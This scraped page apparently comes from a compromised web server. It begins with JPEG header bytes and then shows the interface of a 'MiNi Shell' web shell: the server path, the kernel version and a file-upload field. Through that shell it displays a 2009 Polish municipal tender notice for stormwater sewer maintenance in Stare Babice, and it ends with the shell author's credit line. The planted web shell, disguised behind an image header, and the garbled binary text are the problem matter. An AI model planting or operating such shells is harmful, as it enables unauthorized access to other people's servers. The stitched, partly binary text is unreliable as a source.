JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/24732-N-2009.html

<p class="kh_header"><b>Stare Babice: Przedmiotem zamówienia jest konserwacja kanalizacji deszczowej na terenie gminy Stare Babice.</b><br>
<b>Numer ogłoszenia: 24732 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Babice , Rynek 32, 05-082 Stare Babice, woj. mazowieckie, tel. 0-22 722 95 36, faks 0-22 722 95 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.babice-stare.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest konserwacja kanalizacji deszczowej na terenie gminy Stare Babice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> UWAGA: Prosi się Wykonawców o dokładne zapoznanie się z treścią siwz, a w szczególności z opisem przedmiotu zamówienia i warunkami udziału w postępowaniu, gdyż udział Wykonawcy nie spełniającego postanowień siwz oraz złożenie przez niego oferty i w późniejszym etapie nie uzupełnienie przez niego nie złożonych bądź złożonych wadliwych oświadczeń i dokumentów skutkować będzie zatrzymaniem przez Zamawiającą wadium zgodnie z art. 46 ust. 4a ustawy prawo zamówień publicznych.  

Przedmiot zamówienia: 
Konserwacja kanalizacji deszczowej na terenie gminy Stare Babice na następujących ulicach:
-	ul. Osiedlowa w Starych Babicach - kanał PCV typu DUO: fi 110 o długości 120 m,  fi 160 o długości 286 m, fi 200 o długości 23 m; uzbrojenie: studzienki fi 600 betonowe,  fi 1000 betonowe, fi 315 PCV, złoża żwirowe ze żwiru filtracyjnego o granulacji 16-32 mm; separator substancji ropopochodnych AWAS BK NG 6; wylot do rowu;
-	ul. Osiedlowa w Starych Babicach, ul. Piaskowa, Północna, Prosta, Stacyjna w Zielonkach Parceli - kanał PCV typu DUO: fi  110 o długości 473,6 m,  
fi  160 o długości 522 m; uzbrojenie: studzienki fi 1000 betonowe, fi 315 PCV, wpusty uliczne zamontowane na studzienkach fi 315 PCV - 16 szt. złoża żwirowe z kamienia drogowego o frakcji 16-32 mm; separator substancji ropopochodnych AWAS BK NG 10; wylot do rowu;
-	ul. Modrzewiowa, Berberysowa, Graniczna, Irysowa, Tulipanowa,  Konwaliowa w Kwirynowie - kanał PCV: fi 400 o długości 370 m, fi 200 o długości 855 m; uzbrojenie: studzienki rewizyjne fi 425 PCV, wpusty deszczowe umieszczone na studzienkach fi 600 PCV z osadnikiem - 26 szt.; separator substancji ropopochodnych HAURATON AQUAFIX SKGBP 25; wylot do stawu;
-	ul. Pocztowa w Starych Babicach - kanał PCV: fi 200 o długości 266 m; uzbrojenie: studzienki rewizyjne fi 425 PCV, wpusty deszczowe umieszczone na studzienkach     fi 600 PCV z osadnikiem - 8 szt.; dwa separatory substancji ropopochodnych HAURATON AQUAFIX SKGBP 15; 
-	ul. Rynek w Starych Babicach - wpusty deszczowe umieszczone na studzienkach fi 600 PCV z osadnikiem - 5 szt.;
-	ul. Hubala Dobrzańskiego w Blizne Jasińskiego - kanał PCV: fi 300 o długości 441 m; uzbrojenie: studzienki rewizyjne fi 425 PCV, wpusty deszczowe umieszczone na studzienkach fi 600 PCV z osadnikiem - 11 szt.; separator substancji ropopochodnych HAURATON AQUAFIX SKGBP 15; wylot do rowu;
-	ul. Piłsudskiego w Starych Babicach - - kanał PCV: fi 300 o długości 250 m; uzbrojenie: studzienki rewizyjne fi 425 PCV, wpusty deszczowe umieszczone na studzienkach  fi 600 PCV z osadnikiem - 12 szt.; separator substancji ropopochodnych HAURATON AQUAFIX SKGBP 30;
-	ul. Łaszczyńskiego, ul. Graniczna w Blizne Łaszczyńskiego - kanał PCV: fi 300 o długości 706 m; uzbrojenie: studzienki rewizyjne: fi 425 PCV, betonowe fi 1200, wpusty deszczowe umieszczone na studzienkach  fi 600 PCV z osadnikiem - 23 szt.; separator substancji ropopochodnych HAURATON AQUAFIX SKGBP 15; wylot do stawu;
-	ul. Wodnisko w Borzęcinie Dużym - kanał PCV typu DUO:  fi  200 o długości 108 m, fi  250 o długości 373 m; uzbrojenie: studzienki  fi 425 PCV, złoża żwirowe ze żwiru filtracyjnego o granulacji 16-32 mm; wpusty deszczowe umieszczone na studzienkach  fi 425 PCV z osadnikiem - 2 szt.; wylot do rowu; 
-	ul. Polna w Starych Babicach - kanał fi 300 o długości 360 m, uzbrojenie studzienki rewizyjne fi 425 PCV i fi 1200 betonowe, wpusty deszczowe umieszczone na studzienkach fi 600 PCV z osadnikiem - 22 szt.
-	ul. Przejazd Zielna w Blizne Łaszczyńskiego - kanał fi 300 o długości 333 m, uzbrojenie studzienki rewizyjne fi 425 PCV, wpusty deszczowe umieszczone na studzienkach fi 600 PCV fi 500 betonowe - 15 szt.

Zakres prac będący przedmiotem zamówienia:
Elementy stałe podlegające wynagrodzeniu ryczałtowemu:
a)	czyszczenie wpustów ulicznych i przykanalików;
b)	mechaniczne czyszczenie kanałów kanalizacji deszczowej a w miejscach niedostępnych dla urządzeń czyszczących ręczne czyszczenie kanalizacji deszczowej;
c)	konserwacja separatorów substancji ropopochodnych;
d)	wywiezienie osadów oraz innych materiałów pochodzących  z czyszczenia kanałów, studni, wpustów i innych czynności związanych z konserwacją sieci kanalizacji deszczowej;

Elementy podlegające wynagrodzeniu w oparciu o kosztorys z wykonania prac oparty o stawki jednostkowe z oferty Wykonawcy:
a)	wymiana uszkodzonych krat na wpustach ulicznych;
b)	wymiana uszkodzonych pokryw na studniach rewizyjnych,
c)	regulacja studni rewizyjnych i wpustów ulicznych z naprawą nawierzchni dookoła   wyregulowanej studni lub wpustu ulicznego;
d)	remont uszkodzonych kanałów, studni, wpustów ulicznych  i wycince korzeni w kanałach lub innych urządzeniach;
e)	wywiezienie osadów oraz innych materiałów pochodzących  z czyszczenia kanałów, studni, wpustów i innych czynności związanych z konserwacją sieci kanalizacji deszczowej; 
f)	monitoring kanałów deszczowych;

Zasady prowadzenia robót:
Czyszczenie wpustów ulicznych oraz przykanalików należy przeprowadzić dwa razy w ciągu roku w okresie wiosennym oraz jesiennym. Roboty należy rozpocząć w ciągu 7 dni od momentu zgłoszenia przez Zamawiającego. W przypadku kiedy dwukrotne czyszczenie powyższych elementów nie wystarczy wówczas Zamawiający może zlecić ponowne ich czyszczenie, za którą to czynność Wykonawca otrzyma dodatkowe wynagrodzenie na podstawie kosztorysu sporządzonego w oparciu o stawki jednostkowe podane w przetargu i załączonego do oferty.
Mechaniczne oraz ręczne czyszczenie kanałów należy przeprowadzić również dwa razy w roku w tym samym czasie co czyszczenie wpustów ulicznych i przykanalików. Roboty należy rozpocząć w ciągu 7 dni od momentu zgłoszenia przez Zamawiającego. Do czyszczenia mechanicznego należy używać specjalistycznego sprzętu tj. WUKO, jednak prace należy prowadzić ostrożnie aby nie uszkodzić kanału bądź innych elementów sieci deszczowej. W przypadku uszkodzenia Wykonawca musi je naprawić na własny koszt i we własnym zakresie. W przypadku kiedy dwukrotne czyszczenie kanału nie wystarczy wówczas Zamawiający może zlecić ponowne jego czyszczenie, za którą to czynność Wykonawca otrzyma dodatkowe wynagrodzenie na podstawie kosztorysu sporządzonego w oparciu o stawki jednostkowe podane w przetargu i załączonego do oferty.
Monitoring kanału deszczowego należy przeprowadzić na żądanie Zamawiającego. Film z inspekcji należy zapisać na nośniku CD i przekazać go Zamawiającemu wraz z dokumentacją z monitoringu. 
Wymiana uszkodzonych krat, pokryw, regulacja urządzeń bądź inne czynności interwencyjne prowadzona będzie wyłącznie po protokolarnym stwierdzeniu uszkodzenia w terenie przez osoby odpowiedzialne za konserwację ze strony Zamawiającego i Wykonawcy oraz zleceniu tych czynności przez Zamawiającego.
Remont uszkodzonych kanałów, studni, wpustów ulicznych  i wycinka korzeni w kanałach lub innych urządzeniach prowadzona będzie wyłącznie po protokolarnym stwierdzeniu uszkodzenia w terenie przez osoby odpowiedzialne za konserwację ze strony Zamawiającego i Wykonawcy oraz zleceniu tych czynności przez pracownika Zamawiającego.
Rozliczanie robót, które będą podlegały wycenie wg stawek jednostkowych podanych w ofercie, odbywało się będzie na podstawie kosztorysu sporządzonego przez Wykonawcę i zatwierdzonego przez pracownika Zamawiającego przed wykonaniem robót będących przedmiotem wyceny. W przypadku podjęcia robót przez Wykonawcę przed sprawdzeniem kosztorysu przez pracownika Zamawiającej i zakwestionowaniu przez niego którejś z pozycji wyceny wówczas Zamawiający nie zapłaci za taka pozycję, a Wykonawca skoryguje o przedmiotową wartość przedstawiony do sprawdzenia kosztorys.
Wszelkie roboty interwencyjne podlegające wycenie wg stawek podanych w ofercie Wykonawca podejmie w ciągu 48 godzin od momentu zatwierdzenia kosztorysu przez pracownika Zamawiającego oraz przekazania przez niego wiadomości o jego zatwierdzeniu i wyrażeniu zgody na podjęcie robót. 
Zamawiająca sprawdzi przedstawiony do zatwierdzenia przez Wykonawcę kosztorys na roboty podlegające wycenie wg stawek określonych w ofercie w ciągu 3 dni roboczych od momentu jego dostarczenia.
Wykonawca udostępni numer telefonu, na który można będzie zgłaszać wszelkie awarie wymagające natychmiastowego zabezpieczenia oraz przekazywać informacje o zatwierdzeniu wyceny czy wyrażeniu zgody na podjęcie robót. Zgłoszenie uważać się będzie za przyjęte w momencie telefonicznego przekazania przez pracownika Zamawiającego osobie ze strony Wykonawcy oraz potwierdzeniu przez nią przyjęcia zgłoszenia i podaniu swoich danych tj. imienia i nazwiska.
Wszelkie osady pochodzące z czyszczenia kanałów, studni, wpustów lub inne zanieczyszczenia czy materiały pozostałe po robotach związanych z konserwacją kanału deszczowego Wykonawca zagospodaruje we własnym zakresie i na własny koszt. Nie dopuszcza się składowania niebezpiecznych odpadów w miejscach do tego nieprzystosowanych, należy je wywieźć na składowisko lub wysypisko, na którym mogą być przyjmowane takie materiały.
W przypadku gdy uszkodzenie na kanalizacji deszczowej lub innego jej elementu (np. krata lub pokrywa lub inne) będzie zagrażało bezpieczeństwu użytkowników ruchu bądź mieszkańców Wykonawca w trybie natychmiastowym, nie później niż w czasie 4 godzin od zgłoszenia przez Zamawiającego (pracownicy Urzędu Gminy w Starych Babicach) lub zauważenia usterki w trakcie przeglądu, zabezpieczy i oznakuje teren w widoczny i trwały sposób, a w przypadku konieczności pozostawienia na noc również oświetli za pomocą lamp sygnalizujących lub odblaskowych. 
Przy ewentualnych wymianach elementów sieci kanalizacji deszczowej należy używać tych samych materiałów i o takich samych wymiarach i właściwościach co te użyte przy budowie systemu. Wykonawca na każde żądanie Zamawiającego okaże się atestami na wbudowane przez siebie materiały. W przypadku kiedy Wykonawca wbuduje materiały nie odpowiadające powyższym wymaganiom wówczas na własny koszt dokona wymiany tych materiałów na właściwe wraz z wszelkimi robotami towarzyszącymi tej wymianie.
W trakcie konserwacji separatorów, Wykonawca postępował będzie zgodnie z instrukcją ich użytkowania i zaleceniami ich producenta.
W trakcie prowadzenia robót w miejscach zbliżeń lub skrzyżowań z innymi przewodami podziemnymi lub w miejscach kolizji z infrastrukturą nadziemną Wykonawca będzie je wykonywał w uzgodnieniu z ich właścicielami bądź zarządcami oraz poniesie wszelkie koszty uzgodnień i zabezpieczeń w/w urządzeń.
Wszelkie roboty związane z konserwacją kanalizacji deszczowej można rozpocząć dopiero po wykonaniu oznakowania i zabezpieczenia robót zgodnie z przepisami prawa. Obowiązuje dokonanie komisyjnego odbioru oznakowania i zabezpieczenia robót przy udziale pracownika Zamawiającego. Wykonawca ponosi pełną odpowiedzialność za utrzymanie oznakowania i zabezpieczenia robót w trakcie ich wykonywanych. 
W trakcie wykonywania robót należy umożliwić mieszkańcom dojście i dojazd do posesji, każde naruszenie zjazdu (rozkopanie) uzgadniać indywidualnie z Właścicielem posesji.
Wykonawca ponosi ryzyko wynikające z prowadzenia robót bez zamykania ruchu. Wszelkie roszczenia użytkowników dróg  jakie wpłyną do Zarządzającego, związane z wykonywaniem robót będących przedmiotem niniejszej SIWZ i umowy będą kierowane do Wykonawcy w celu ich załatwienia.
W związku z tym że część sieci kanalizacji deszczowej objęta jest gwarancją udzieloną przez Wykonawcę robót należy, po zasięgnięciu takiej informacji od Zamawiającego, roboty prowadzić w uzgodnieniu  z tym Wykonawcą. 

Termin rozpoczęcia prac ustala się wstępnie na luty 2009 r.
Termin zakończenia robót przewiduje ustala się na 18.12.2009r.

Za jakość zastosowanych materiałów i wykonywanych robót odpowiedzialny jest Wykonawca robót.
Nie dopuszcza się składania ofert częściowych i wariantowych.
Przewiduje się w okresie 3 lat od udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.64.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium 

Oferent obowiązany jest wnieść wadium w wysokości 4 000,00 zł  (słownie: cztery tysiące zł 00/100) przed upływem terminu składania ofert w następującej formie:
1)	W pieniądzu (wpłatę wadium należy dokonać na konto: 65 8015 0004 3000 1124 3030 0009 z dopiskiem Konserwacja kanalizacji deszczowej na terenie gminy Stare Babice, a kopię przelewu dołączyć do oferty.
2)	W poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3)	W gwarancjach bankowych.
4)	W gwarancjach ubezpieczeniowych.
5)	W poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).

Wadium wnoszone w formie gwarancji musi być co najmniej gwarancją nieodwołalną 
i płatną na każde pisemne żądanie Zamawiającej.
Wadium wnoszone w innych dopuszczonych formach niż w pieniądzu należy złożyć w oryginale  wraz z pismem przewodnim u Skarbnika Gminy w siedzibie Urzędu Gminy, pokój nr 9, a potwierdzoną kopię dołączyć do oferty.
Oferty bez dowodów wniesienia wadium będą traktowane jako nie spełniające wymagań przetargu i na tej podstawie zostaną odrzucone bez dalszego rozpatrywania.

Zwrot wadium 

       Zwrot wadium następuje zgodnie z art. 46 ustawy Prawo zamówień publicznych.

Sytuacje skutkujące przepadkiem wadium na rzecz zamawiającej

Wadium przechodzi na rzecz Zamawiającej wówczas gdy:
1)	Wykonawca wybrany do zawarcia umowy odmówił jej podpisania na warunkach określonych w ofercie w wyznaczonym terminie podanym mu do wiadomości przez Zamawiającą;
2)	Wykonawca, który złożył najkorzystniejszą ofertę, odmówił wniesienia zabezpieczenia należytego wykonania umowy;
3)	Zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
4)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 (Prawo zamówień publicznych), nie złożył dokumentów, o których mowa w art. 25 ust. 1 (Prawo zamówień publicznych), lub pełnomocnictw, chyba że Wykonawca udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki zakwalifikowania wykonawcy o udzielenie zamówienia publicznego:

Do składania ofert zostaną zakwalifikowani oferenci:
1)	dopuszczeni do udziału w postępowaniu po uwzględnieniu treści punktu 5 niniejszej specyfikacji istotnych warunków zamówienia;
2)	uprawnieni do występowania jako podmioty gospodarcze tj. posiadający odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania oferty;
3)	posiadający aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS wystawione nie wcześniej niż 3 miesiące przed terminem składania oferty;
4)	posiadający pozytywne i udokumentowane doświadczenie jako wykonawcy dwóch podobnych zadań - zał. 4 (za spełnienie tego warunku uważa się dwa zadania polegające na konserwacji sieci kanalizacji sanitarnej, deszczowej lub ogólnospławnej o wartości co najmniej 100 000 zł każde) zrealizowanych w ciągu trzech ostatnich lat, a jeżeli okres działalności jest krótszy to w tym okresie. Na potwierdzenie doświadczenia należy dołączyć referencje od Inwestorów - zał. 8; 
5)	organizacyjnie, finansowo i technicznie zdolni do sprawnej realizacji przedmiotu zamówienia. Na potwierdzenie należy dołączyć zał. 2   -  Wykaz sprzętu jakim dysponuje Wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia wymaganego sprzętu (co najmniej: koparko - ładowarka, samochód dostawczy, samochód ciężarowy, samochód typu Beczka o pojemności co najmniej 3 m3, samochód typu WUKO, zagęszczarki); 
zał. 3 -  Potencjał kadrowy jakim dysponuje Wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia wymaganego potencjału kadrowego (co najmniej jedna osoba z uprawnieniami sanitarnymi) oraz pozostałe załączniki wymienione w pkt. 7.

W przypadku gdy Wykonawcy zamierzają wspólnie ubiegać się o zamówienie ustanawiają wtedy pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana Zamawiająca zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.

W przypadku gdy Oferent przewiduje zlecenie części prac podwykonawcy, to powinien on przedstawić oświadczenie podpisane przez upoważnionego przedstawiciela Podwykonawcy o gotowości do współpracy podczas prowadzenia robót związanych z konserwacją sieci kanalizacji deszczowej na terenie gminy Stare Babice z Wykonawcą biorącym udział w postępowaniu przetargowym. Przy czym Wykonawca musi własnymi siłami wykonać zakres robót obejmujący co najmniej prace określone w pkt. 4 siwz z wyłączeniem mechanicznego czyszczenia kanałów oraz monitoringiem kanalizacji, które to prace mogą zostać zlecone do wykonania Podwykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie swojej wiarygodności, doświadczenia i zdolności do realizacji przedmiotu zamówienia, oferenci zobowiązani są załączyć:

1.   	zał. 1
	Oferta wykonawcy.
	zał. 2	Wykaz sprzętu jakim dysponuje Wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia wymaganego sprzętu (co najmniej: koparko - ładowarka, samochód dostawczy, samochód ciężarowy, samochód typu Beczka o pojemności co najmniej 3m3, samochód typu WUKO, zagęszczarki).
	zał. 3	Potencjał kadrowy jakim dysponuje Wykonawca lub pisemne zobowiązanie innego podmiotu do udostępnienia wymaganego potencjału kadrowego (co najmniej jedna osoba z uprawnieniami sanitarnymi).
	zał. 4	Wykaz zamówień o charakterze i złożoności porównywalnej (za spełnienie tego warunku uważa się dwa zadania polegające na konserwacji sieci kanalizacji sanitarnej, deszczowej lub ogólnospławnej o wartości co najmniej 100 000 zł każde, dopuszcza się również zadania związane z budową w/w sieci jednak wartość tych zadań musi wynosić co najmniej 100 000 zł każde) z zakresem zadania będącego przedmiotem zamówienia 
	
Wymagane dokumenty.

	Zał. 5	Wypis z rejestru firmy lub dla firm nie ewidencjonowanych w rejestrach handlowych - wypis z Urzędu Gminy o prowadzeniu działalności gospodarczej.

	Zał. 6	Zaświadczenie z Urzędu Skarbowego o nie zaleganiu w płaceniu należnego  podatku.

	Zał. 7	Zaświadczenie ZUS o nie zaleganiu w płaceniu składek.

	Zał. 8	Listy referencyjne od Inwestorów.

	Zał. 9	Kosztorys obejmujący czyszczenie 1 wpustu wraz z wszelkimi pracami niezbędnymi do wykonania tej czynności oparty o stawki jednostkowe podane w ofercie Wykonawcy
	Zał. 10	Kosztorys obejmujący czyszczenie 1 m kanału deszczowego z rur PVC    fi 200, fi 300, fi 400 wraz z wszelkimi pracami niezbędnymi do wykonania tej czynności oparty o stawki jednostkowe podane w ofercie Wykonawcy
	Zał. 11	Kosztorys obejmujący czyszczenie 1 m kanału deszczowego z rur drenarskich PVC typu DUO fi 110, fi 160, fi 200 wraz z wszelkimi pracami niezbędnymi do wykonania tej czynności oparty o stawki jednostkowe podane w ofercie Wykonawcy

W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa zamiast dokumentów określonych wyżej jako zał. 5, 6, 7 składa dokumenty przewidziane w § 2 Rozporządzenia Rady Ministrów z dnia z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy. Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605 z późn. zm.

Uwaga:   Informacje powyższe muszą być udzielone w formie pisemnej. Wypełnione formularze, dokumenty i oświadczenia stanowią załącznik do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.babice-stare.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stare Babice
ul. Rynek 32
05-082 Stare Babice
pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 12:00, miejsce: Urząd Gminy Stare Babice
ul. Rynek 32
05-082 Stare Babice
pokój nr 18.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com